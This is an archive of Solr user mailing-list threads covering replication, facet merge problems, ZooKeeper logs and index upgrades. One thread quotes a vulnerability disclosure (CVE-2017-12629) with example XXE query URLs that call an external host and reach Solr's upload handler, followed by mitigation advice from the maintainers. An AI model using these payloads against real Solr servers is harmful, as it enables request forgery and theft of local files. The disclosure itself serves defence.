Re: Solrcloud replication not working

2017-10-12 Thread solr2020
The problem was replicationFactor was set to 1.Now replication works fine
while setting replicationFactor as 2.



--
Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Re: Inconsistent results for facet queries

2017-10-12 Thread Chris Ulicny
We tested the query on all replicas for the given shard, and they all have
the same issue. So deleting and adding another replica won't fix the
problem since the leader is exhibiting the behavior as well. I believe the
second replica was moved (new one added, old one deleted) between nodes and
so was just a copy of the leader's index after the problematic merge
happened.

bq: Anything that didn't merge old segments, just threw them
away when empty (which was my idea) would possibly require as much
disk space as the index currently occupied, so doesn't help your
disk-constrained situation.

Something like this was originally what I thought might fix the issue. If
we reindex the data for the affected shard, it would possibly delete all
docs from the old segments and just drop them instead of merging them. As
mentioned, you'd expect the problems to persist through subsequent merges.
So I've got two questions

1) If the problem persists through merges, does it only affect the segments
being merged, and then when solr goes looking for the values, it comes up
empty? Instead of all segments being affected by a single merge they
weren't a part of.

2) Is it expected that any large tainted segments will eventually merge
with clean segments resulting in more tainted segments as enough docs are
deleted on the large segments?

Also, we aren't disk constrained as much as previously. Reindexing a subset
of docs is possible, but a full clean collection reindex isn't.

Thanks,
Chris


On Thu, Oct 12, 2017 at 11:13 AM Erick Erickson 
wrote:

> Never mind. Anything that didn't merge old segments, just threw them
> away when empty (which was my idea) would possibly require as much
> disk space as the index currently occupied, so doesn't help your
> disk-constrained situation.
>
> Best,
> Erick
>
> On Thu, Oct 12, 2017 at 8:06 AM, Erick Erickson 
> wrote:
> > If it's _only_ on a particular replica, here's what you could do:
> > Just DELETEREPLICA on it, then ADDREPLICA to bring it back. You can
> > define the "node" parameter on ADDREPLICA to get it back on the same
> > node. Then the normal replication process would pull the entire index
> > down from the leader.
> >
> > My bet, though, is that this wouldn't really fix things. While it fixes
> the
> > particular case you've noticed I'd guess others would pop up. You can
> > see what replicas return what by firing individual queries at the
> > particular replica in question with &distrib=false, something like
> >
> solr_server:port/solr/collection1_shard1_replica1/query?distrib=false&blah
> > blah blah
> >
> >
> > bq: It is exceedingly unfortunate that reindexing the data on that shard
> only
> > probably won't end up fixing the problem
> >
> > Well, we've been working on the DWIM (Do What I Mean) feature for years,
> > but progress has stalled.
> >
> > How would that work? You have two segments with vastly different
> > characteristics for a field. You could change the type, the
> multiValued-ness,
> > the analysis chain, there's no end to the things that could go wrong.
> Fixing
> > them actually _is_ impossible given how Lucene is structured.
> >
> > H, you've now given me a brainstorm I'll suggest on the JIRA
> > system after I talk to the dev list
> >
> > Consider indexed=true stored=false. After stemming, "running" can be
> > indexed as "run". At merge time you have no way of knowing that
> > "running" was the original term so you simply couldn't fix it on merge,
> > not to mention that the performance penalty would be...er...
> > severe.
> >
> > Best,
> > Erick
> >
> > On Thu, Oct 12, 2017 at 5:53 AM, Chris Ulicny  wrote:
> >> I thought that decision would come back to bite us somehow. At the
> time, we
> >> didn't have enough space available to do a fresh reindex alongside the
> old
> >> collection, so the only course of action available was to index over the
> >> old one, and the vast majority of its use worked as expected.
> >>
> >> We're planning on upgrading to version 7 at some point in the near
> future
> >> and will have enough space to do a full, clean reindex at that time.
> >>
> >> bq: This can propagate through all following segment merges IIUC.
> >>
> >> It is exceedingly unfortunate that reindexing the data on that shard
> only
> >> probably won't end up fixing the problem.
> >>
> >> Out of curiosity, are there any good write-ups or documentation on how
> two
> >> (or more) lucene segments are merged, or is it just worth looking at the
> >> source code to figure that out?
> >>
> >> Thanks,
> >> Chris
> >>
> >> On Wed, Oct 11, 2017 at 6:55 PM Erick Erickson  >
> >> wrote:
> >>
> >>> bq: ...but the collection wasn't emptied first
> >>>
> >>> This is what I'd suspect is the problem. Here's the issue: Segments
> >>> aren't merged identically on all replicas. So at some point you had
> >>> this field indexed without docValues, changed that and re-indexed. But
> >>> the segment merging could "read" the first segment it's going to merge
> >>> and thi

Unsubscribe my email

2017-10-12 Thread Shashi Roushan
Please unsubscribe my email .

Regards,
Shashi Roushan


Re: Unsubscribe my email

2017-10-12 Thread Erick Erickson
Please follow the instructions here:
http://lucene.apache.org/solr/community.html#mailing-lists-irc. You
must use the _exact_ same e-mail as you used to subscribe.

If the initial try doesn't work and following the suggestions at the
"problems" link doesn't work for you, let us know. But note you need
to show us the _entire_ return header to allow anyone to diagnose the
problem.

Best,
Erick

On Thu, Oct 12, 2017 at 10:07 AM, Shashi Roushan
 wrote:
> Please unsubscribe my email .
>
> Regards,
> Shashi Roushan


Re: Inconsistent results for facet queries

2017-10-12 Thread Erick Erickson
(1) It doesn't matter whether it "affect only segments being merged".
You can't get accurate information if different segments have
different expectations.

(2) I strongly doubt it. The problem is that the "tainted" segments'
meta-data is still read when merging. If the segment consisted of
_only_ deleted documents you'd probably lose it, but it'll be
re-merged long before it consists of exclusively deleted documents.

Really, you have to re-index to be sure, I suspect you can find some
way to do this faster than exploring undefined behavior and hoping.

If you can re-index _anywhere_ to a collection with the same number of
shards you can get this done, it'll take some tricky dancing but

0> copy one index directory from each shard someplace safe.
1> reindex somewhere, single-replica will do.
2> Delete all replicas except one for your current collection
3> issue an admin API command fetchindex for each replica in old
collection, pulling the index "from the right place" in the new
collection. It's important that there only be a single replica for
each shard active at this point. These two collection do _not_ need to
be part of the same SolrCloud, the fetchindex command just takes a URL
of the core to fetch from.
4> add the replicas back and let them replicate.

Your installation would be unavailable for searching during steps 2-4 of course.

Best,
Erick

On Thu, Oct 12, 2017 at 9:01 AM, Chris Ulicny  wrote:
> We tested the query on all replicas for the given shard, and they all have
> the same issue. So deleting and adding another replica won't fix the
> problem since the leader is exhibiting the behavior as well. I believe the
> second replica was moved (new one added, old one deleted) between nodes and
> so was just a copy of the leader's index after the problematic merge
> happened.
>
> bq: Anything that didn't merge old segments, just threw them
> away when empty (which was my idea) would possibly require as much
> disk space as the index currently occupied, so doesn't help your
> disk-constrained situation.
>
> Something like this was originally what I thought might fix the issue. If
> we reindex the data for the affected shard, it would possibly delete all
> docs from the old segments and just drop them instead of merging them. As
> mentioned, you'd expect the problems to persist through subsequent merges.
> So I've got two questions
>
> 1) If the problem persists through merges, does it only affect the segments
> being merged, and then when solr goes looking for the values, it comes up
> empty? Instead of all segments being affected by a single merge they
> weren't a part of.
>
> 2) Is it expected that any large tainted segments will eventually merge
> with clean segments resulting in more tainted segments as enough docs are
> deleted on the large segments?
>
> Also, we aren't disk constrained as much as previously. Reindexing a subset
> of docs is possible, but a full clean collection reindex isn't.
>
> Thanks,
> Chris
>
>
> On Thu, Oct 12, 2017 at 11:13 AM Erick Erickson 
> wrote:
>
>> Never mind. Anything that didn't merge old segments, just threw them
>> away when empty (which was my idea) would possibly require as much
>> disk space as the index currently occupied, so doesn't help your
>> disk-constrained situation.
>>
>> Best,
>> Erick
>>
>> On Thu, Oct 12, 2017 at 8:06 AM, Erick Erickson 
>> wrote:
>> > If it's _only_ on a particular replica, here's what you could do:
>> > Just DELETEREPLICA on it, then ADDREPLICA to bring it back. You can
>> > define the "node" parameter on ADDREPLICA to get it back on the same
>> > node. Then the normal replication process would pull the entire index
>> > down from the leader.
>> >
>> > My bet, though, is that this wouldn't really fix things. While it fixes
>> the
>> > particular case you've noticed I'd guess others would pop up. You can
>> > see what replicas return what by firing individual queries at the
>> > particular replica in question with &distrib=false, something like
>> >
>> solr_server:port/solr/collection1_shard1_replica1/query?distrib=false&blah
>> > blah blah
>> >
>> >
>> > bq: It is exceedingly unfortunate that reindexing the data on that shard
>> only
>> > probably won't end up fixing the problem
>> >
>> > Well, we've been working on the DWIM (Do What I Mean) feature for years,
>> > but progress has stalled.
>> >
>> > How would that work? You have two segments with vastly different
>> > characteristics for a field. You could change the type, the
>> multiValued-ness,
>> > the analysis chain, there's no end to the things that could go wrong.
>> Fixing
>> > them actually _is_ impossible given how Lucene is structured.
>> >
>> > H, you've now given me a brainstorm I'll suggest on the JIRA
>> > system after I talk to the dev list
>> >
>> > Consider indexed=true stored=false. After stemming, "running" can be
>> > indexed as "run". At merge time you have no way of knowing that
>> > "running" was the original term so you simply could

Re: Inconsistent results for facet queries

2017-10-12 Thread Chris Ulicny
I'm not sure if that method is viable for reindexing and fetching the whole
collection at once for us, but unless there is something inherent in that
process which happens at the collection level, we could do it a few shards
at a time since it is a multi-tenant setup.

I'll see if we can setup a small test in QA for this, and test it out. This
facet issue is the only one we've noticed and is able to be worked around,
so we might end up just waiting until we reindex for version 7.X to
permanently fix it.

Thanks
Chris

On Thu, Oct 12, 2017 at 1:41 PM Erick Erickson 
wrote:

> (1) It doesn't matter whether it "affect only segments being merged".
> You can't get accurate information if different segments have
> different expectations.
>
> (2) I strongly doubt it. The problem is that the "tainted" segments'
> meta-data is still read when merging. If the segment consisted of
> _only_ deleted documents you'd probably lose it, but it'll be
> re-merged long before it consists of exclusively deleted documents.
>
> Really, you have to re-index to be sure, I suspect you can find some
> way to do this faster than exploring undefined behavior and hoping.
>
> If you can re-index _anywhere_ to a collection with the same number of
> shards you can get this done, it'll take some tricky dancing but
>
> 0> copy one index directory from each shard someplace safe.
> 1> reindex somewhere, single-replica will do.
> 2> Delete all replicas except one for your current collection
> 3> issue an admin API command fetchindex for each replica in old
> collection, pulling the index "from the right place" in the new
> collection. It's important that there only be a single replica for
> each shard active at this point. These two collection do _not_ need to
> be part of the same SolrCloud, the fetchindex command just takes a URL
> of the core to fetch from.
> 4> add the replicas back and let them replicate.
>
> Your installation would be unavailable for searching during steps 2-4 of
> course.
>
> Best,
> Erick
>
> On Thu, Oct 12, 2017 at 9:01 AM, Chris Ulicny  wrote:
> > We tested the query on all replicas for the given shard, and they all
> have
> > the same issue. So deleting and adding another replica won't fix the
> > problem since the leader is exhibiting the behavior as well. I believe
> the
> > second replica was moved (new one added, old one deleted) between nodes
> and
> > so was just a copy of the leader's index after the problematic merge
> > happened.
> >
> > bq: Anything that didn't merge old segments, just threw them
> > away when empty (which was my idea) would possibly require as much
> > disk space as the index currently occupied, so doesn't help your
> > disk-constrained situation.
> >
> > Something like this was originally what I thought might fix the issue. If
> > we reindex the data for the affected shard, it would possibly delete all
> > docs from the old segments and just drop them instead of merging them. As
> > mentioned, you'd expect the problems to persist through subsequent
> merges.
> > So I've got two questions
> >
> > 1) If the problem persists through merges, does it only affect the
> segments
> > being merged, and then when solr goes looking for the values, it comes up
> > empty? Instead of all segments being affected by a single merge they
> > weren't a part of.
> >
> > 2) Is it expected that any large tainted segments will eventually merge
> > with clean segments resulting in more tainted segments as enough docs are
> > deleted on the large segments?
> >
> > Also, we aren't disk constrained as much as previously. Reindexing a
> subset
> > of docs is possible, but a full clean collection reindex isn't.
> >
> > Thanks,
> > Chris
> >
> >
> > On Thu, Oct 12, 2017 at 11:13 AM Erick Erickson  >
> > wrote:
> >
> >> Never mind. Anything that didn't merge old segments, just threw them
> >> away when empty (which was my idea) would possibly require as much
> >> disk space as the index currently occupied, so doesn't help your
> >> disk-constrained situation.
> >>
> >> Best,
> >> Erick
> >>
> >> On Thu, Oct 12, 2017 at 8:06 AM, Erick Erickson <
> erickerick...@gmail.com>
> >> wrote:
> >> > If it's _only_ on a particular replica, here's what you could do:
> >> > Just DELETEREPLICA on it, then ADDREPLICA to bring it back. You can
> >> > define the "node" parameter on ADDREPLICA to get it back on the same
> >> > node. Then the normal replication process would pull the entire index
> >> > down from the leader.
> >> >
> >> > My bet, though, is that this wouldn't really fix things. While it
> fixes
> >> the
> >> > particular case you've noticed I'd guess others would pop up. You can
> >> > see what replicas return what by firing individual queries at the
> >> > particular replica in question with &distrib=false, something like
> >> >
> >>
> solr_server:port/solr/collection1_shard1_replica1/query?distrib=false&blah
> >> > blah blah
> >> >
> >> >
> >> > bq: It is exceedingly unfortunate that reindexing the data on tha

Re: Indexing files from HDFS

2017-10-12 Thread Shawn Heisey

On 10/12/2017 2:04 AM, István wrote:

The question is not about Hue but about why file_path is in the schema for
HDFS files when using search-mr. I am wondering what is the standard way of
indexing files on HDFS.


The error in your original post indicates that at least one document in 
the update request contains a "file_path" field, but the active schema 
on the Solr index does NOT have that field, so Solr is not able to 
handle the indexing request.


It appears that you are using Cloudera software to do the indexing.  If 
you cannot tell why the indexing requests have that field, then you will 
need to talk to Cloudera about how their software works.


One idea that might work is to add the file_path field to your schema 
with a correct type so the indexing requests that are being sent will be 
handled correctly.


Thanks,
Shawn



Re: Solrcloud replication not working

2017-10-12 Thread Shawn Heisey

On 10/10/2017 2:51 AM, solr2020 wrote:

i could see different version of the below entries in Leader and replica.
While doing index , in replica instance logs we could see it is keep
receiving update request from leader but it says no changes, skipping
commit.

Master (Searching)  
Master (Replicable) 

There is no other error messages related to replication.Any idea why this is
happening?
Is there any API to run replication manually.


The replication feature (which is what exposes the version numbers you 
have referenced) is *not* a part of normal SolrCloud operation.  
Replication is only used for recovery operations -- when SolrCloud 
determines that a replica has been out of touch with the rest of the 
cloud for enough updates that it must completely overwrite the index 
with a verbatim copy from the leader.  When that kind of recovery is 
required, Solr will temporarily designate one index as a master, another 
index as a slave, and utilize the replication feature to copy the index 
from one to the other.


For SolrCloud, you cannot make any kind of judgement based on the 
replication index version numbers.  It is normal for those numbers to 
vary between replicas.


During normal operation, SolrCloud keeps indexes in sync by performing 
the same indexing operations on all replicas and keeping track of those 
updates in the transaction log.


Regarding your most recent update on the thread, the replicationFactor 
value normally has absolutely no bearing on normal SolrCloud operation.  
Unless your indexes are stored in HDFS with the HDFSDIrectoryFactory, 
the only time Solr ever does anything with replicationFactor is when the 
collection is initially created.


Running Solr as root is not recommended for security reasons, but isn't 
going to cause this problem.


If there are no error messages in your logs, then I would suspect 
problems with the network or with the operating system that are keeping 
your Solr servers from communicating with each other properly.  Is the 
Solr log on the server that is the shard leader also error-free?


Thanks,
Shawn



Re: Getting user-level KeeperException

2017-10-12 Thread Amrit Sarkar
Gunalan,

Zookeeper throws KeeperException at /overseer for most of the solr issues,
namely indexing. Sync the timestamp of zookeeper error with solr log; the
problem lies there most probably.

Amrit Sarkar
Search Engineer
Lucidworks, Inc.
415-589-9269
www.lucidworks.com
Twitter http://twitter.com/lucidworks
LinkedIn: https://www.linkedin.com/in/sarkaramrit2

On Thu, Oct 12, 2017 at 7:52 AM, Gunalan V  wrote:

> Hello,
>
> Could someone please let me know what this user-level keeper exception in
> zookeeper mean? and How to fix the same.
>
>
>
>
>
> Thanks,
> GVK
>


Re: Several critical vulnerabilities discovered in Apache Solr (XXE & RCE)

2017-10-12 Thread Cassandra Targett
Michael,

On behalf of the Lucene PMC, thank you for reporting these issues. Please
be assured we are actively looking into them and are working to provide
resolutions as soon as possible. Somehow no one in the Lucene/Solr
community saw your earlier mail so we have an unfortunate delay in reacting
to this report.

This has been assigned a public CVE (CVE-2017-12629) which we will
reference in future communication about resolution and mitigation steps.

For everyone following this thread, here is what we're doing now:

* Until fixes are available, all Solr users are advised to restart their
Solr instances with the system parameter `-Ddisable.configEdit=true`. This
will disallow any changes to be made to configurations via the Config API.
This is a key factor in this vulnerability, since it allows GET requests to
add the RunExecutableListener to the config.
** This is sufficient to protect you from this type of attack, but means
you cannot use the edit capabilities of the Config API until the other
fixes described below are in place.

* A new release of Lucene/Solr was in the vote phase, but we have now
pulled it back to be able to address these issues in the upcoming 7.1
release. We will also determine mitigation steps for users on earlier
versions, which may include a 6.6.2 release for users still on 6.x.

* The RunExecutableListener will be removed in 7.1. It was previously used
by Solr for index replication but has been replaced and is no longer needed.

* The XML Parser will be fixed and the fixes will be included in the 7.1
release.

* The 7.1 release was already slated to include a change to disable the
`stream.body` parameter by default, which will further help protect systems.

We hope you are unable to find any vulnerabilities in the future, but, for
the record, the ASF policy for reporting these types of issues is to email
them to secur...@apache.org only. This is to prevent vulnerabilities from
getting out into the public before fixes can be identified so we avoid
exposing our community to attacks by malicious actors. More information on
these policies is available from the Security Team's website:
https://www.apache.org/security/.

We will have more information shortly about the timing of the 7.1 release
as well as ways for pre-7.0 users to gain access to the fixes for their
versions.

Best,
Cassandra


On Thu, Oct 12, 2017 at 7:16 AM, Michael Stepankin 
wrote:

> Hello,
>
> Could you look at this please. It’s a bit important.
>
> On Fri, 22 Sep 2017 at 01:15, Michael Stepankin 
> wrote:
>
>> Hello
>>
>> We would like to report two important vulnerabilities in the latest
>> Apache Solr distribution. Both of them have critical risk rating and they
>> could be chained together in order to compromise the running Solr server
>> even from unprivileged external attacker.
>>
>> *First Vulnerability: XML External Entity Expansion (deftype=xmlparser) *
>>
>> Lucene includes a query parser that is able to create the full-spectrum
>> of Lucene queries, using an XML data structure. Starting from version 5.1
>> Solr supports "xml" query parser in the search query.
>>
>> The problem is that lucene xml parser does not explicitly prohibit
>> doctype declaration and expansion of external entities. It is possible to
>> include special entities in the xml document, that point to external files
>> (via file://) or external urls (via http://):
>>
>> Example usage: http://localhost:8983/solr/gettingstarted/select?q={!
>> xmlparser v='http://xxx.s.artsploit.com/xxx
>> "'>'}
>>
>> When Solr is parsing this request, it makes a HTTP request to
>> http://xxx.s.artsploit.com/xxx and treats its content as DOCTYPE
>> definition.
>>
>> Considering that we can define parser type in the search query, which is
>> very often comes from untrusted user input, e.g. search fields on websites.
>> It allows to an external attacker to make arbitrary HTTP requests to the
>> local SOLR instance and to bypass all firewall restrictions.
>>
>> For example, this vulnerability could be user to send malicious data to
>> the '/upload' handler:
>>
>> http://localhost:8983/solr/gettingstarted/select?q={!xmlparser
>> v='http://xxx.s.artsploit.com/
>> solr/gettingstarted/upload?stream.body={"xx":"yy"}&
>> commit=true"'>'}
>>
>> This vulnerability can also be exploited as Blind XXE using ftp wrapper
>> in order to read arbitrary local files from the solrserver.
>>
>> *Vulnerable code location:*
>> /solr/src/lucene/queryparser/src/java/org/apache/lucene/
>> queryparser/xml/CoreParser.java
>>
>> static Document parseXML(InputStream pXmlFile) throws ParserException {
>> DocumentBuilderFactory dbf = *DocumentBuilderFactory.newInstance*();
>> DocumentBuilder db = null;
>> try {
>>   db = *dbf.newDocumentBuilder*();
>> }
>> catch (Exception se) {
>>   throw new ParserException("XML Parser configuration error", se);
>> }
>> org.w3c.dom.Document doc = null;
>> try {
>>   doc = *db.parse*(*pXmlFile*);
>> }
>>
>>

Re: Getting user-level KeeperException

2017-10-12 Thread Shawn Heisey

On 10/11/2017 8:22 PM, Gunalan V wrote:
Could someone please let me know what this user-level keeper exception 
in zookeeper mean? and How to fix the same.


Those are not errors.  They are INFO logs.  They are not an indication 
of a problem.  If they were a problem, they would most likely be at the 
WARN or ERROR level instead of INFO.


The message indicates that 16 requests came in to create "/overseer" in 
the zookeeper database.  These requests all failed because that entry in 
the database was already there.  The failure is just information, not an 
error.


All of the requests indicate that they came from session ID 
0x35f0e3edd390001.  An earlier entry in the log indicates that this 
session is a connection from 10.138.66.12.


The code in Solr that creates that ZK node looks like it is called in 
MANY places.  Once of those places is the code for leader elections.  
This probably means that it gets called at least once for every shard in 
the entire cloud on each Solr node startup, and could be called quite 
frequently for other reasons.


It could be argued that this code in Solr should check for the existence 
of the node before it tries to create it, but as I already said, this 
isn't a problem.


Thanks,
Shawn



Disabling XmlQParserPlugin through solrconfig

2017-10-12 Thread Manikandan Sivanesan
I'm looking for a way to disable the query parser XmlQParserPlugin
(org.apache.solr.search.XmlQParserPlugin) through solrconfig.xml .
Following the instructions mentioned here
 to
disable a query parser.

This is the part that I added to solrconfig.

Re: Disabling XmlQParserPlugin through solrconfig

2017-10-12 Thread Manikandan Sivanesan
Sorry noticed the typo. Am providing the corrected version


On Thu, Oct 12, 2017 at 5:18 PM, Manikandan Sivanesan 
wrote:

> I'm looking for a way to disable the query parser XmlQParserPlugin
> (org.apache.solr.search.XmlQParserPlugin) through solrconfig.xml .
> Following the instructions mentioned here
> 
> to disable a query parser.
>
> This is the part that I added to solrconfig.
>  enable="{enable.xmlparser:false}/>
>
> I have uploaded it to zk and reloaded the collection. But I still see the
> XmlQParserPlugin loaded in
> in the Plugin/Stats => QUERYPARSER section of Solr Admin Console.
>
>
> Any advise on this?
> Thank you for your time.
> --
> Manikandan Sivanesan
> Senior Software Engineer
>



-- 
Manikandan Sivanesan
Senior Software Engineer


Re: Disabling XmlQParserPlugin through solrconfig

2017-10-12 Thread Shawn Heisey

On 10/12/2017 3:18 PM, Manikandan Sivanesan wrote:

I'm looking for a way to disable the query parser XmlQParserPlugin
(org.apache.solr.search.XmlQParserPlugin) through solrconfig.xml .
Following the instructions mentioned here
 to
disable a query parser.

This is the part that I added to solrconfig.


Through experimentation, I was able to figure out that the configuration 
of query parsers DOES support the "enable" attribute.  Initially I 
thought it might not.


With this invalid configuration (the class is missing a character), Solr 
will start correctly:




But if I change the enable attribute to "true" instead of "false", Solr 
will NOT successfully load the core with that config, because it 
contains a class that cannot be found.


The actual problem you're running into is that almost every query parser 
implementation that Solr has is hard-coded and explicitly loaded by code 
in QParserPlugin.  One of those parsers is the XML parser that you want 
to disable.


I think it would be a good idea to go through the list of hard-coded 
parsers in the QParserPlugin class and make it a MUCH smaller list.  
Some of the parsers, especially the XML parser, probably should require 
explicit configuration rather than being included by default.


Thanks,
Shawn



Re: Disabling XmlQParserPlugin through solrconfig

2017-10-12 Thread Trey Grainger
You can also just "replace" the registered xml query parser with another
parser. I imagine you're doing this for security reasons, which means you
just want the actual xml query parser to not be executable through a query.
Try adding the following line to your solrconfig.xml:


This way, the xml query parser is loaded in as a version of the eDismax
query parser instead, and any queries the are trying to reference the xml
query parser through local params will instead hit the eDismax query parser
and use its parsing logic instead.

All the best,

Trey Grainger
SVP of Engineering @ Lucidworks
Co-author, Solr in Action 
http://www.treygrainger.com

-

On Thu, Oct 12, 2017 at 6:56 PM, Shawn Heisey  wrote:

> On 10/12/2017 3:18 PM, Manikandan Sivanesan wrote:
>
>> I'm looking for a way to disable the query parser XmlQParserPlugin
>> (org.apache.solr.search.XmlQParserPlugin) through solrconfig.xml .
>> Following the instructions mentioned here
>> 
>> to
>> disable a query parser.
>>
>> This is the part that I added to solrconfig.
>> > enable="{enable.xmlparser:false}/>
>>
>> I have uploaded it to zk and reloaded the collection. But I still see the
>> XmlQParserPlugin loaded in
>> in the Plugin/Stats => QUERYPARSER section of Solr Admin Console.
>>
>
> Through experimentation, I was able to figure out that the configuration
> of query parsers DOES support the "enable" attribute.  Initially I thought
> it might not.
>
> With this invalid configuration (the class is missing a character), Solr
> will start correctly:
>
> 
>
> But if I change the enable attribute to "true" instead of "false", Solr
> will NOT successfully load the core with that config, because it contains a
> class that cannot be found.
>
> The actual problem you're running into is that almost every query parser
> implementation that Solr has is hard-coded and explicitly loaded by code in
> QParserPlugin.  One of those parsers is the XML parser that you want to
> disable.
>
> I think it would be a good idea to go through the list of hard-coded
> parsers in the QParserPlugin class and make it a MUCH smaller list.  Some
> of the parsers, especially the XML parser, probably should require explicit
> configuration rather than being included by default.
>
> Thanks,
> Shawn
>
>


Re: Disabling XmlQParserPlugin through solrconfig

2017-10-12 Thread Manikandan Sivanesan
Thanks a lot. This is the suggestion we are proceeding forward with.

On Thu, Oct 12, 2017 at 7:59 PM, Trey Grainger  wrote:

> You can also just "replace" the registered xml query parser with another
> parser. I imagine you're doing this for security reasons, which means you
> just want the actual xml query parser to not be executable through a query.
> Try adding the following line to your solrconfig.xml:
>  />
>
> This way, the xml query parser is loaded in as a version of the eDismax
> query parser instead, and any queries the are trying to reference the xml
> query parser through local params will instead hit the eDismax query parser
> and use its parsing logic instead.
>
> All the best,
>
> Trey Grainger
> SVP of Engineering @ Lucidworks
> Co-author, Solr in Action 
> http://www.treygrainger.com
>
> -
>
> On Thu, Oct 12, 2017 at 6:56 PM, Shawn Heisey  wrote:
>
> > On 10/12/2017 3:18 PM, Manikandan Sivanesan wrote:
> >
> >> I'm looking for a way to disable the query parser XmlQParserPlugin
> >> (org.apache.solr.search.XmlQParserPlugin) through solrconfig.xml .
> >> Following the instructions mentioned here
> >>  >
> >> to
> >> disable a query parser.
> >>
> >> This is the part that I added to solrconfig.
> >>  >> enable="{enable.xmlparser:false}/>
> >>
> >> I have uploaded it to zk and reloaded the collection. But I still see
> the
> >> XmlQParserPlugin loaded in
> >> in the Plugin/Stats => QUERYPARSER section of Solr Admin Console.
> >>
> >
> > Through experimentation, I was able to figure out that the configuration
> > of query parsers DOES support the "enable" attribute.  Initially I
> thought
> > it might not.
> >
> > With this invalid configuration (the class is missing a character), Solr
> > will start correctly:
> >
> > 
> >
> > But if I change the enable attribute to "true" instead of "false", Solr
> > will NOT successfully load the core with that config, because it
> contains a
> > class that cannot be found.
> >
> > The actual problem you're running into is that almost every query parser
> > implementation that Solr has is hard-coded and explicitly loaded by code
> in
> > QParserPlugin.  One of those parsers is the XML parser that you want to
> > disable.
> >
> > I think it would be a good idea to go through the list of hard-coded
> > parsers in the QParserPlugin class and make it a MUCH smaller list.  Some
> > of the parsers, especially the XML parser, probably should require
> explicit
> > configuration rather than being included by default.
> >
> > Thanks,
> > Shawn
> >
> >
>



-- 
Manikandan Sivanesan
Senior Software Engineer


Re: is there a way to remove deleted documents from index without optimize

2017-10-12 Thread Harry Yoo
I should have read this. My project has been running from apache solr 4.x, and 
moved to 5.x and recently migrated to 6.6.1. Do you think solr will take care 
of old version indexes as well? I wanted to make sure my indexes are updated 
with 6.x lucence version so that it will be supported when i move to solr 7.x

Is there any best practice managing solr indexes?

Harry

> On Sep 22, 2015, at 8:21 PM, Walter Underwood  wrote:
> 
> Don’t do anything. Solr will automatically clean up the deleted documents for 
> you.
> 
> wunder
> Walter Underwood
> wun...@wunderwood.org
> http://observer.wunderwood.org/  (my blog)
> 
> 
>> On Sep 22, 2015, at 6:01 PM, CrazyDiamond  wrote:
>> 
>> my index is updating frequently and i need to remove unused documents from
>> index after update/reindex.
>> Optimizaion is very expensive so what should i do?
>> 
>> 
>> 
>> --
>> View this message in context: 
>> http://lucene.472066.n3.nabble.com/is-there-a-way-to-remove-deleted-documents-from-index-without-optimize-tp4230691.html
>> Sent from the Solr - User mailing list archive at Nabble.com.
> 



Re: is there a way to remove deleted documents from index without optimize

2017-10-12 Thread Erick Erickson
You can use the IndexUpgradeTool that ships with each version of Solr
(well, actually Lucene) to, well, upgrade your index. So you can use
the IndexUpgradeTool that ships with 5x to upgrade from 4x. And the
one that ships with 6x to upgrade from 5x. etc.

That said, none of that is necessary _if_ you
> have the Lucene version in solrconfig.xml be the one that corresponds to your 
> current Solr. I.e. a solrconfig for 6x should have a luceneMatchVersion of 
> 6something.
> you update your index enough to rewrite all segments before moving to the 
> _next_ version. When Lucene sees merges a segment, it writes the new segment 
> according to the luceneMatchVersion in solrconfig.xml. So as long as you are 
> on a version long enough for all segments to be merged into new segments, you 
> don't have to worry.

Best,
Erick

On Thu, Oct 12, 2017 at 8:29 PM, Harry Yoo  wrote:
> I should have read this. My project has been running from apache solr 4.x, 
> and moved to 5.x and recently migrated to 6.6.1. Do you think solr will take 
> care of old version indexes as well? I wanted to make sure my indexes are 
> updated with 6.x lucence version so that it will be supported when i move to 
> solr 7.x
>
> Is there any best practice managing solr indexes?
>
> Harry
>
>> On Sep 22, 2015, at 8:21 PM, Walter Underwood  wrote:
>>
>> Don’t do anything. Solr will automatically clean up the deleted documents 
>> for you.
>>
>> wunder
>> Walter Underwood
>> wun...@wunderwood.org
>> http://observer.wunderwood.org/  (my blog)
>>
>>
>>> On Sep 22, 2015, at 6:01 PM, CrazyDiamond  wrote:
>>>
>>> my index is updating frequently and i need to remove unused documents from
>>> index after update/reindex.
>>> Optimizaion is very expensive so what should i do?
>>>
>>>
>>>
>>> --
>>> View this message in context: 
>>> http://lucene.472066.n3.nabble.com/is-there-a-way-to-remove-deleted-documents-from-index-without-optimize-tp4230691.html
>>> Sent from the Solr - User mailing list archive at Nabble.com.
>>
>


Re: Getting user-level KeeperException

2017-10-12 Thread Gunalan V
Thanks Shawn and Amrit!

On Thu, Oct 12, 2017 at 4:05 PM, Shawn Heisey  wrote:

> On 10/11/2017 8:22 PM, Gunalan V wrote:
>
>> Could someone please let me know what this user-level keeper exception in
>> zookeeper mean? and How to fix the same.
>>
>
> Those are not errors.  They are INFO logs.  They are not an indication of
> a problem.  If they were a problem, they would most likely be at the WARN
> or ERROR level instead of INFO.
>
> The message indicates that 16 requests came in to create "/overseer" in
> the zookeeper database.  These requests all failed because that entry in
> the database was already there.  The failure is just information, not an
> error.
>
> All of the requests indicate that they came from session ID
> 0x35f0e3edd390001.  An earlier entry in the log indicates that this session
> is a connection from 10.138.66.12.
>
> The code in Solr that creates that ZK node looks like it is called in MANY
> places.  Once of those places is the code for leader elections.  This
> probably means that it gets called at least once for every shard in the
> entire cloud on each Solr node startup, and could be called quite
> frequently for other reasons.
>
> It could be argued that this code in Solr should check for the existence
> of the node before it tries to create it, but as I already said, this isn't
> a problem.
>
> Thanks,
> Shawn
>
>


book on solr

2017-10-12 Thread Jay Potharaju
Hi,
I am looking for a book that covers some basic principles on how to scale
solr. Are there any suggestions.
Example how to scale , by adding shards or replicas in the case of high rps
and high index rates.

Any blog or documentation also that would provide some basic rules or
guidelines for scaling would also be great.

Thanks
Jay Potharaju


Re: book on solr

2017-10-12 Thread Rick Leir
Jay, get info on this with a search: 
https://www.google.ca/search?q=solr+shard+size


cheers -- Rick

On 2017-10-13 01:42 AM, Jay Potharaju wrote:

Any blog or documentation also that would provide some basic rules or
guidelines for scaling would also be great.

Thanks
Jay Potharaju